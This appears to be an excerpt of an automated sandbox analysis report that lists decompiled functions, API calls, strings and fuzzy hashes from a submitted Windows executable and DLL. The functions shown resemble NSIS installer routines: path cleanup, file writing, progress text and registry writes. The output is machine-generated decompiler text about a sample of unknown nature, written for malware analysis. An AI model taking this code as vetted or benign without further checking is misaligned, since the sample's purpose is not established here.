                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FromString$CloseOpenValue
                    • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                    • API String ID: 3688305288-1256949467
                    • Opcode ID: f03e850746073d282dd987d0edd5d7caf8e3b523e648412af87769f60fdc9c94
                    • Instruction ID: 3d080639a5fd2197325cbe9e03500c8865ccd0ed7b3d72ff4c98c75b705f7c93
                    • Opcode Fuzzy Hash: f03e850746073d282dd987d0edd5d7caf8e3b523e648412af87769f60fdc9c94
                    • Instruction Fuzzy Hash: D4314FB6940219BBEB14DF94DC85FEE73B8EB49341F008058FA0996145E634EA949BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002160, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100021B9
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100021C9
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002224
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 10002246
                    • RegCloseKey.ADVAPI32(?), ref: 10002250
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FromString$CloseOpenValue
                    • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                    • API String ID: 3688305288-1256949467
                    • Opcode ID: f0c014063032bbd75d30b83dfac5fb48da85f70de656bc15ac6c8e9d452fed6d
                    • Instruction ID: fb3cb9da5819c23884a4b77f928473d1b313ab34d7c643c00f0768f96e8e8d25
                    • Opcode Fuzzy Hash: f0c014063032bbd75d30b83dfac5fb48da85f70de656bc15ac6c8e9d452fed6d
                    • Instruction Fuzzy Hash: EC3171F6900208BFEB10DFD4DC45FEE73B8EB49340F008058FA09A6145E734EA949BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001490, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100014BA
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100014CA
                    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000152F
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 1000155E
                    • RegCloseKey.ADVAPI32(?), ref: 1000156E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FromString$CloseCreateValue
                    • String ID: %s\%s\%s\0x%08x\%s$Enable$LanguageProfile
                    • API String ID: 32363474-1306068423
                    • Opcode ID: 4e1f72c7d4bd86fa4041fda2954218bf90ae87b2140984ffc23d4f352f8ccb16
                    • Instruction ID: eb039ca75822e1645de2ad74749ae0bb4c02f0157e4a2942e20983e75e2c4b1d
                    • Opcode Fuzzy Hash: 4e1f72c7d4bd86fa4041fda2954218bf90ae87b2140984ffc23d4f352f8ccb16
                    • Instruction Fuzzy Hash: 10210CB5900318FBEB10DB90CC89FEEB7B8EB48701F108158F6196A185D774AA848BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100010A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000070), ref: 100010AA
                    • HeapAlloc.KERNEL32(00000000), ref: 100010B1
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 10001108
                    • HeapFree.KERNEL32(00000000), ref: 1000110F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Heap$Process$AllocFree
                    • String ID: returning %p
                    • API String ID: 756756679-1981732286
                    • Opcode ID: 75eca707130296f40e5c5b98ff7bbd53ddfb3e31bdf2205a41f9c8cc76739bb8
                    • Instruction ID: 1471c95420fb663fffc943fd2b11557840353f2bc27fe329463f806675b50420
                    • Opcode Fuzzy Hash: 75eca707130296f40e5c5b98ff7bbd53ddfb3e31bdf2205a41f9c8cc76739bb8
                    • Instruction Fuzzy Hash: 56211074A44204FBE710DFA0CC89BADB7B4EB49745F208048FA09AB395D775EE80DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002FF0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,-00000039), ref: 1000305D
                    • RegEnumKeyExW.ADVAPI32(?,?,?,00000027,00000000,00000000,00000000,00000000), ref: 100030A6
                    • RegCloseKey.ADVAPI32(?), ref: 100030C5
                    • CLSIDFromString.OLE32(?,?), ref: 100030FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CloseEnumFromOpenString
                    • String ID: %s\%s\0x%08x$'$LanguageProfile
                    • API String ID: 2638302380-2813637096
                    • Opcode ID: 59377314a68b51317bde71a37529f5d2b286c452b2dca7912ec117a53ce0b1b1
                    • Instruction ID: 130724da2326a449f1dba4cbb61217882b606c12bcd76e0e73fa58f95a325ca4
                    • Opcode Fuzzy Hash: 59377314a68b51317bde71a37529f5d2b286c452b2dca7912ec117a53ce0b1b1
                    • Instruction Fuzzy Hash: 1F61E5B5A00209EFDB04DF54C880BAABBB9FF48354F10C659F9199B385D770EA85CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405B89, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405B89(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040548B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                    0x00405b8b
                    0x00405b93
                    0x00405ba7
                    0x00405ba7
                    0x00405bad
                    0x00405bba
                    0x00405bba
                    0x00405bbb
                    0x00405bbd
                    0x00405bc1
                    0x00405bc3
                    0x00405bcc
                    0x00405bce
                    0x00405be8
                    0x00405bf0
                    0x00405bf0
                    0x00405bf5
                    0x00405bf7
                    0x00405bf9
                    0x00405bfd
                    0x00405bfe
                    0x00405c01
                    0x00405c09
                    0x00405c0b
                    0x00405c0f
                    0x00000000
                    0x00000000
                    0x00405c15
                    0x00405c1a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c1a
                    0x00405c1f

                    APIs
                    • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                    • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                    • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                    • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-1861984517
                    • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                    • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                    • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                    • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403D44, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                    0x00403d56
                    0x00403dea
                    0x00000000
                    0x00403dea
                    0x00403d67
                    0x00403d6b
                    0x00000000
                    0x00000000
                    0x00403d71
                    0x00403d7a
                    0x00403d7d
                    0x00403d7d
                    0x00403d83
                    0x00403d89
                    0x00403d89
                    0x00403d95
                    0x00403d9b
                    0x00403da2
                    0x00403da5
                    0x00403da8
                    0x00403daa
                    0x00403daa
                    0x00403db2
                    0x00403db8
                    0x00403db8
                    0x00403dc2
                    0x00403dc7
                    0x00403dca
                    0x00403dcf
                    0x00403dd2
                    0x00403dd2
                    0x00403de2
                    0x00403de2
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                    • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040548B(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E004055E3(_t52);
				_t27 = E00405602(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74; // 0x8200
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403098(_t47);
						E00403066(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                    0x0040266e
                    0x00402670
                    0x0040267c
                    0x0040267f
                    0x00402689
                    0x0040268d
                    0x0040268d
                    0x00402693
                    0x004026a0
                    0x004026a8
                    0x004026ab
                    0x004026b1
                    0x004026bf
                    0x004026c4
                    0x004026c8
                    0x004026cb
                    0x004026d4
                    0x004026e0
                    0x004026e4
                    0x004026e7
                    0x004026f1
                    0x00402710
                    0x004026f8
                    0x004026fd
                    0x00402705
                    0x00402708
                    0x0040270d
                    0x0040270d
                    0x00402717
                    0x00402717
                    0x00402729
                    0x00402730
                    0x00402742
                    0x00402742
                    0x00402748
                    0x00402748
                    0x00402753
                    0x00402754
                    0x00402758
                    0x0040275c
                    0x00402762
                    0x00402762
                    0x00402769
                    0x00402156
                    0x00402880
                    0x0040288c

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                    • GlobalFree.KERNEL32 ref: 00402717
                    • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                    • GlobalFree.KERNEL32 ref: 00402730
                    • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                    • String ID:
                    • API String ID: 3294113728-0
                    • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                    • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                    • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                    • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404CC9, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404CC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
					}
					_t26 = lstrlenA(0x4297b0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                    0x00404ccf
                    0x00404cdb
                    0x00404cde
                    0x00404ce4
                    0x00404cf0
                    0x00404cf3
                    0x00404cf6
                    0x00404cfc
                    0x00404cfc
                    0x00404d02
                    0x00404d0a
                    0x00404d0d
                    0x00404d2a
                    0x00404d2e
                    0x00404d37
                    0x00404d37
                    0x00404d41
                    0x00404d4a
                    0x00404d56
                    0x00404d5d
                    0x00404d61
                    0x00404d64
                    0x00404d77
                    0x00404d85
                    0x00404d85
                    0x00404d89
                    0x00404d8b
                    0x00404d8e
                    0x00000000
                    0x00404d8e
                    0x00404d0f
                    0x00404d17
                    0x00404d1f
                    0x00404d25
                    0x00000000
                    0x00404d25
                    0x00404d1f
                    0x00404d0d
                    0x00404d98

                    APIs
                    • lstrlenA.KERNEL32(004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                    • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                    • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F887,74E5EA30), ref: 00404D25
                    • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                    • String ID:
                    • API String ID: 2531174081-0
                    • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                    • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                    • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                    • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404598, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404598(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                    0x004045a6
                    0x004045b3
                    0x004045b9
                    0x004045f7
                    0x004045f7
                    0x00404606
                    0x0040460d
                    0x00000000
                    0x0040460f
                    0x004045bb
                    0x004045ca
                    0x004045d2
                    0x004045d5
                    0x004045e7
                    0x004045ed
                    0x004045f4
                    0x00000000
                    0x004045f4
                    0x00000000

                    APIs
                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                    • GetMessagePos.USER32 ref: 004045BB
                    • ScreenToClient.USER32 ref: 004045D5
                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                    • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402B2D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b78; // 0x497ec
					_t11 =  *0x428b88; // 0x497f0
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                    0x00402b3a
                    0x00402b48
                    0x00402b4e
                    0x00402b4e
                    0x00402b5c
                    0x00402b5e
                    0x00402b64
                    0x00402b6b
                    0x00402b6d
                    0x00402b6d
                    0x00402b83
                    0x00402b93
                    0x00402ba5
                    0x00402ba5
                    0x00402bad

                    APIs
                    Strings
                    • verifying installer: %d%%, xrefs: 00402B7D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                    • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                    • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                    • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100033C0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcpynW.KERNEL32(?,?,00000027), ref: 10003436
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 10003499
